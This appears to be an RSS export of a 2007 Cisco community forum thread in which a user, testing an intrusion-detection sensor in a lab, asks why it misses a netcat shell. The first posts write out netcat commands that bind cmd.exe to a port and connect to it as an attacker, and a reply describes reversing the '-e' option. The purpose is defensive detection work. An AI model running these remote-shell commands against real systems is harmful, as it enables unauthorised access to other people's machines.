<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>topic Re: IPS will not detect a successful netcat attack in Network Security</title>
    <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724</link>
    <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;Got it! But, as a matter of fact my doubt was: &lt;/P&gt;&lt;P&gt;Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
    <pubDate>Fri, 14 Sep 2007 16:59:48 GMT</pubDate>
    <dc:creator>jopontes</dc:creator>
    <dc:date>2007-09-14T16:59:48Z</dc:date>
    <item>
      <title>IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854131#M85720</link>
      <description>&lt;P&gt;I am doing the following lab testing: &lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;nc ?v ?l ?e cmd.exe ?p 565&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;Attacker: &lt;/P&gt;&lt;P&gt;nc ?v .x.x.x.x 565&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;I was able to get the remote prompt and the IDS never fires an alarm. Is there a signature for detecting this kind of attack? Or, is there any signature tuning that can be done for that?  What would be the best way for detecting and firing an alarm for that attack? &lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;Any help is highly appreciated. &lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;&lt;/P&gt;</description>
      <pubDate>Sun, 10 Mar 2019 10:47:47 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854131#M85720</guid>
      <dc:creator>jopontes</dc:creator>
      <dc:date>2019-03-10T10:47:47Z</dc:date>
    </item>
    <item>
      <title>Re: IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854132#M85722</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;***&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;nc -v -l -e cmd.exe -p 565&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;Attacker:&lt;/P&gt;&lt;P&gt;nc -v .x.x.x.x 565 &lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Thu, 13 Sep 2007 19:23:39 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854132#M85722</guid>
      <dc:creator>jopontes</dc:creator>
      <dc:date>2007-09-13T19:23:39Z</dc:date>
    </item>
    <item>
      <title>Re: IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854133#M85723</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;You are using netcat to setup a listener on port 565 and asking it to execute cmd.exe when a client connects.  It doesn't actually send "cmd.exe" to the client, it redirects STDIN and STDOUT to the client.&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;To trigger your signature, setup the listener without a "-e" command.  Have the client use "-e cmd.exe" when connecting.&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Fri, 14 Sep 2007 16:29:49 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854133#M85723</guid>
      <dc:creator>mhellman</dc:creator>
      <dc:date>2007-09-14T16:29:49Z</dc:date>
    </item>
    <item>
      <title>Re: IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;Got it! But, as a matter of fact my doubt was: &lt;/P&gt;&lt;P&gt;Can IDS sensors detect netcat activity on the network? Does the netcat operates in a RFC TCP standards and therefore it is seen as normal traffic?&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;P&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Fri, 14 Sep 2007 16:59:48 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854134#M85724</guid>
      <dc:creator>jopontes</dc:creator>
      <dc:date>2007-09-14T16:59:48Z</dc:date>
    </item>
    <item>
      <title>Re: IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854135#M85725</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;Not reliably AFAIK.  It's not like telnet or ftp that tend to use specific ports or have application RFC's.  With the latest version of Cisco IDS you might be able to trigger on unusual port usage (anomaly detection).  I haven't played with that much yet myself.&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Fri, 14 Sep 2007 17:05:32 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854135#M85725</guid>
      <dc:creator>mhellman</dc:creator>
      <dc:date>2007-09-14T17:05:32Z</dc:date>
    </item>
    <item>
      <title>Re: IPS will not detect a successful netcat attack</title>
      <link>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854136#M85726</link>
      <description>&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;P&gt;Thanks Matt! I'll try to update the sensor and play with that then. &lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;</description>
      <pubDate>Fri, 14 Sep 2007 17:31:16 GMT</pubDate>
      <guid>https://community.cisco.com/t5/network-security/ips-will-not-detect-a-successful-netcat-attack/m-p/854136#M85726</guid>
      <dc:creator>jopontes</dc:creator>
      <dc:date>2007-09-14T17:31:16Z</dc:date>
    </item>
  </channel>
</rss>

